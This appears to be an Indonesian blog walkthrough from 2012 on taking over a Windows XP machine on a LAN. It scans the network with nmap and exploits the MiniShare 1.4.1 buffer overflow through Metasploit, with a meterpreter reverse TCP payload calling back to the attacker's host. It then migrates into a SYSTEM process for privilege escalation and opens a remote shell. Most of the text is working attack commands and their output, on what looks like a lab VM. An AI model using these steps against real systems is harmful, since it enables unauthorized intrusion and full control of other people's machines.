Preparation:
[*] nmap
[*] Metasploit
Walkthrough:
1. Scan Host
Exploitasi selalu berawal dari reconnaissance, atau yang sering disebut sebagai information gathering. Untuk melakukan tahap ini, saya akan menggunakan nmap untuk melakukan information gathering. Khusunya dalam mencari tau, siapa saja yang sedang berada dalam Local Area Network. Buka terminal, lalu masukan perintah:
Command :
root@revolution:~# nmap -sn 192.168.1.1-255
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2012-01-07 20:21 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0022s latency).
MAC Address: F4:EC:38:C5:5B:CC (Tp-link Technologies CO.)
Nmap scan report for 192.168.1.3
Host is up.
Nmap scan report for 192.168.1.4
Host is up (0.00044s latency).
MAC Address: E0:B9:A5:9D:37:E9 (Azurewave)
Nmap scan report for 192.168.1.7
Host is up (0.079s latency).
MAC Address: E0:B9:A5:9D:18:94 (Azurewave)
Nmap done: 255 IP addresses (4 hosts up) scanned in 43.05 seconds
IP address saya 192.168.1.3, mari kita lihat port yang terbuka pada host 192.168.1.4
2. Reconnaissance - Find Vulnerability
Command :
root@revolution:~# nmap -A 192.168.1.4
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2012-01-07 20:24 WIT
Stats: 0:02:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.12% done; ETC: 20:27 (0:00:01 remaining)
Nmap scan report for 192.168.1.4
Host is up (0.0013s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Minishare http interface 1.4.1 (0 files, 0 bytes shared)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
MAC Address: E0:B9:A5:9D:37:E9 (Azurewave)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: VICTIM, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:aa:99:56 (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 1.31 ms 192.168.1 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.10 seconds 
OK. Sekarang kita tau bahwa host 192.168.1.4 menggunakan MiniShare versi 1.4.1. Langkah selanjutnya adalah menemukan exploit yang tepat.
3. Find The Exploit
Dalam konsol metasploit, ketik "search minishare" tanpa tanda petik. Hal ini ditujukan untuk mengetahui exploit mana yang paling tepat untuk kita gunakan dalam meng-eksploit host 192.168.1.4
Command :
msf > search minishare
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/minishare_get_overflow 2004-11-07 average Minishare 1.4.1 Buffer Overflow
Sekarang kita akan menggunakan Module ini untuk mendapatkan akses
4. Gaining Access
Masukan perintah berikut dalam konsol metaploit:
Command :
msf > use exploit/windows/http/minishare_get_overflow
msf exploit(minishare_get_overflow) > set PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => windows/meterpreter/reverse_ord_tcp
msf exploit(minishare_get_overflow) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(minishare_get_overflow) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(minishare_get_overflow) > set TARGET 3
TARGET => 3Kemudian cek exploit kita:
Command :
msf exploit(minishare_get_overflow) > show options
Module options (exploit/windows/http/minishare_get_overflow):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 192.168.1.4 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_ord_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.1.3 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
3 Windows XP SP2 English
Kemudian kita eksploit.
Command :
msf exploit(minishare_get_overflow) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] Trying target address 0x71ab9372...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:1047) at 2012-01-07 20:14:28 +0700
meterpreter > Berhasil. Kita telah membuka meterpreter sesi pertama.
5. Privilege Escalation
Cek ID kita dengan perintah "getuid" dan cek juga process work directory kita dengan perintah "pwd" [tanpa tanda petik]
Command :
meterpreter > getuid
Server username: VICTIM\User
meterpreter > pwd
C:\Program Files\MiniShare
Terlihat di atas, bahwa ID kita bukan NT AUTHORITY\SYSTEM aka root. Untuk melakukan privilege escalation, kita akan melakukan proses migrasi dengan perintah "migrate [pid]" [tanpa tanda petik]
Untuk menemukan PID milik NT AUTHORITY\SYSTEM, kita akan gunakan perintah "ps" [tanpa tanda petik], kemudian cek kolom user, dan temukan NT AUTHORITY\SYSTEM.
Command :
meterpreter > psProcess list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1028 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1084 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1248 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
132 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1328 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
1452 explorer.exe x86 0 VICTIM\User C:\WINDOWS\Explorer.EXE
1536 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1628 VMwareTray.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1636 vmtoolsd.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2036 minishare.exe x86 0 VICTIM\User C:\Program Files\MiniShare\minishare.exe
216 TPAutoConnect.exe x86 0 VICTIM\User C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
380 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0
512 wscntfy.exe x86 0 VICTIM\User C:\WINDOWS\system32\wscntfy.exe
600 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
680 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
840 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
848 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
936 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exeOk. Sekarang kita menemukan salah satu PID yang dijalankan oleh user NT AUTHORITY\SYSTEM. Lakukan proses migrate dengan perintah "migrate [pid]". Kali ini saya akan melakukan migrasi ke PID 856 bernama svchost.exe.
Command :
meterpreter > migrate 856
[*] Migrating to 856...
[*] Migration completed successfully.Kemudian kita cek kembali ID dan PWD kita
Command :
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32Untuk menyempurnakan, kita akan mengambil alih command prompt korban dengan perintah "shell".
Command :
meterpreter > shell
Process 720 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Sempurna!!!
created by: red-dragon
0 comment:
Post a Comment